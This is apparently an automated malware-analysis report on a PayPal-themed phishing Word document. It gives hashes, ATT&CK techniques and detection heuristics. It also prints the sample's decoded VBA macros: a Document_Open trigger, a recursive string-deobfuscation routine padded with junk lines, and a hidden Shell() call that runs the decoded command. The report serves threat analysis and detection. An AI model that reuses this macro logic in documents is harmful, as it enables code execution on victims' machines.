Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 1cbb1afc45ea8a0e…

MALICIOUS

Office (OLE)

Size: 47.5 KB
Created: 2018-10-10 02:11:00
Authoring application: Microsoft Office Word
First seen: 2019-02-10
MD5: 8506caad14eb3f2e2067aedaf5f81c26
SHA-1: 6c83a3be2696e05906757f6758234f1516f0e13f
SHA-256: 1cbb1afc45ea8a0e39b3698b7f464e670b8896f544320ed33f19769cd5451470
182 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1566.001 Phishing: Spearphishing Attachment

The sample contains VBA macros, including a Document_Open macro, which is a common technique for malicious Office documents. The Document_Open macro utilizes a Shell() call, indicating an attempt to execute arbitrary code. The document body impersonates PayPal, requesting sensitive personal information under the guise of account verification, which is a phishing lure. No specific malware family could be identified.

Heuristics 5

  • ClamAV: Doc.Malware.Generic-6715186-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Generic-6715186-0
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 2961 bytes
SHA-256: 483da09ffa1f3ce62a6e814f0113df77a0968786b9025f7b6805e296c5f855af
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub Document_Open()
ac = "2"
ac = "3"
actually ac
ac = "5"
End Sub

Attribute VB_Name = "filterException"
Sub fputc(fileindex, cstdlib, ByRef GUI)
GUI = Right(Left(fileindex, cstdlib), 1)
End Sub

Sub incf(ByRef data)
data = data + 1
End Sub

Sub Be(The, ByRef fpStackWalk64)
fpStackWalk64 = ""
MERCHANTABILITY = 1
WARRANTY MERCHANTABILITY, fpStackWalk64, The
End Sub

Sub WARRANTY(ByRef template, ByRef returnValue, clean)
success = Len(clean)
If template <= success Then
ft = ""
fputc clean, template, ft
pt = 1
p ft, pt
ut = ""
ULONG64 pt - 2, ut
returnValue = returnValue + ut
template = template + 1
WARRANTY template, returnValue, clean
End If
End Sub

Sub ULONG64(ContextRecord, ByRef context)
context = ""
If ContextRecord < 1 Then
fputc shutdown.details, Len(shutdown.details) + ContextRecord, context
Else
fputc shutdown.details, ContextRecord, context
End If
End Sub

Sub PCSTR(ByRef each0, ByRef SIGUSR1, try)
If each0 < Len(shutdown.details) Then
    ft = ""
    fputc shutdown.details, each0, ft
    If try <> ft Then
    each0 = each0 + 1
    PCSTR each0, SIGUSR1, try
    Else
    SIGUSR1 = each0
    End If
End If
End Sub

Sub p(try, ByRef SIGUSR1)
each0 = 1
SIGUSR1 = 1
PCSTR each0, SIGUSR1, try
End Sub
Attribute VB_Name = "instances"
Public Sub actually(analysis)
shutdown.EXIT_FAILURE = analysis
End Sub

Attribute VB_Name = "shutdown"
Attribute VB_Base = "0{4FCE4F8A-F0B3-4576-B882-B7854387FEB6}{3AFB2CD7-F646-43F3-AB0E-EE046835B48A}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False


Private Sub try_Change()

inline = 88
inline = 74
inline = 100
inline = 8
inline = 56
inline = 66
inline = 94
inline = 94
inline = 41
inline = 42
inline = 78
inline = 39
verbose = shutdown.try
inline = 39
inline = 74
inline = 50
inline = 69
inline = 82
inline = 43
inline = 97
inline = 44
inline = 62
inline = 63
inline = 76
inline = 57
inline = 90
inline = 73
inline = 43
inline = 26
inline = 64
inline = 9
inline = 98
inline = 90
inline = 25
Shell verbose, 0
inline = 56
inline = 21
inline = 2
inline = 82
inline = 91
inline = 56
inline = 15
inline = 38
inline = 11
inline = 25
inline = 37
inline = 78
inline = 23
inline = 63
inline = 10
inline = 6
inline = 54
End Sub

Private Sub EXIT_FAILURE_Change()
terminate
End Sub

Attribute VB_Name = "sig"
Public Sub terminate()
fbe = ""
Be shutdown.fler, fbe
shutdown.pid_t = fbe
shutdown.try = shutdown.pid_t
End Sub